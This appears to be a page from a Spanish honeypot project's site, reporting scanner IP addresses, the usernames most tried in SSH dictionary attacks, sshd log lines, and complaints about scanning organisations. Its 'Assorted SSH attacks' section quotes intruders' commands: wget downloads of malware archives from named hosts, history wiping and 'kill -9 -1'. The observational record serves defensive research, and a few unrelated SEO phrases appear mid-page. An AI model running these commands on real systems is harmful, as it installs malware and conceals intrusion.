174.37.118.36
174.121.40.29
174.123.109.34
174.140.167.227
184.173.245.52
195.190.31.220
206.188.193.58
207.7.92.6
216.172.174.86
218.83.152.252
218.219.158.195
221.1.220.149
221.192.199.49
221.194.46.176
222.186.24.221
Note that it is useless to complain or warn someone, since they are not hijacked devices. Apart of other intentions, as a result of their actions many others are wasting time and resources, and that's why we [will do our best for disturbing them a little from March on.] are glad to see that Proxyfire has been facing some trouble during april:

The other scanners needed to set up at least five spare (until then) sites after april 2012:
173.201.240.31 proxyproxys·com piggmail·com verysurf·com nsegame·com

A boo for a couple image-hosting places
In sept. 2011 our site suffered a persistent attack from 62.129.242.122, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we got to know that those indonesians were using a few image-sharing sites for their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.

Where on earth are the Honeypots?
After reading the "Cyber Crime Alert" report by the FBI (spring of 2011) it seems that bad guys think that here, in Spain, we run an incredible 69 per cent of the Honeypots in the World and, besides, they use to share the IPs where honeypots are supposed to be. Well, concerning our own IPs, wether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other Honeypot here apart from ours.

Weird ways of figthting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :

200.93.147.154 - - [17/Feb/2010:13:57:49 +0200] "GET pollbooth.php?include_path HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"

No comment :D

September of 2009: attackers tried to login under 10374 different user names.
The most attacked were:

9850
1034
690
431
264
224
208
206
195
190
root
admin
test
oracle
user
guest
robert
mysql
michael
paul 190
177
176
176
168
166
162
154
152
148
info
postgres
amanda
adam
sales
martin
backup
student
ftpuser
suporte 132
130
130
130
126
126
124
120
115
114
testing
nagios
eric
david
web
tester
john
richard
sarah
sam 114
110
107
106
104
102
101
100
100
100
patrick
bruce
matt
mark
cyrus
teste
marc
webmaster
mail
download
Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David", "Amanda" and "Martin" (common names in both languages).
Bad boys never sleep:
2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 209.44.120.2. It lasted for 8 hours and they tried 20.859 username + password combinations.

2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:

Jul 7 19:27:42 (void) sshd[28641]: Accepted password for (not shown) from 76.191.100.182 port 47065 ssh2
Jul 7 20:25:37 (void) sshd[12823]: Accepted password for (not shown) from 121.189.19.126 port 46649 ssh2
Jul 7 21:17:08 (void) sshd[8048]: Accepted password for (not shown) from 79.112.214.99 port 1266 ssh2
Jul 7 23:45:48 (void) sshd[28775]: Accepted password for (not shown) from 221.111.75.119 port 33195 ssh2
Jul 7 23:47:14 (void) sshd[31450]: Accepted password for (not shown) from 221.111.75.119 port 51866 ssh2
Jul 7 23:53:28 (void) sshd[8496]: Accepted password for (not shown) from 188.24.255.242 port 30856 ssh2
Some flashy detections:
Telnet scans from 128.59.14.100 -128.59.14.116 (Columbia University) which happened to be a false positive. Read about their project. Nevertheless, after a re-visit in Sep. 2011, we found a number of things that we dislike:
They don't say when it will come to an end, it is always an "ongoing" project. I guess that knocking at other's doors should last as short as possible. Since they have moved to SSH probing, what's next?
They are making money of it: a company, several patents, sponsored by several military offices, conferences, publications... Therefore, output about the results is scarce. If noboby else is going to take advantage of the investigations, it does not make much difference compared to other daily scans.
Fake results in Gnutella network from 65.50.67.197 (www.markmonitor.com) in March 2010... when looking for public domain files!
Port scan from 69.48.241.84 (www.trustedsource.org, owned by McAfee Antivirus) in December 21th 2009.
Sharing fake files in Gnutella network from 65.55.102.24 (Microsoft Corporation), October 21th and November 1st of 2009..
Port scan from 208.43.71.139 (Avast Antivirus) in September and October of 2009.
Assorted SSH attacks
Gathering information

qwanturank
seo qwanturank
concours seo qwant
qwanturank.ovh

w
uptime
id
ls -a
uname -a
cat /proc/cpuifno
ps x
wget
curl -O

After a previous succesful login

rm -rf .bash_history
history -c
w
ps x
ls -a

Attempting to get rid of the honeypot

bash
sh
kill -9 -1
reboot
exit Sending malware to the target

uname -a
passwd
wget http://nasa.undernet.nm.ru/udp.tgz
tar zxvf udp.tgz
Other deliveries came from

dragutrau.clan.su/Trade/army.tar.gz
freewebtown.com/hotzu/py/ryo.tar
prigat.ucoz.com/mangalia.tgz

Attackers don't want us to see what they do

unset HISTFILE HISTSAVE HISTLOG WATCH
HISTFILE=/dev/null

Attempting to run malware

cd /dev/shm
su

Dumb DoS or speed test?

Get involved

1-Contribute

This project is nonprofit. If you feel that you could donate or you've got some hardware you don't need, please contact us.

2-Join us or share your information, findings, logs...

We are always glad to receive information about attackers, new threats etc. Also, we have developed some automatic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.

3-Special request for english speakers

English is not our first language. We would be very grateful if you let us know about typos, weird expressions, etc.

4-Run a honeypot

Straightforward to run, transparent, no installation, just "chmod + x" and you're done. Alternatively you can use our web forms or API. Please contact us for further info.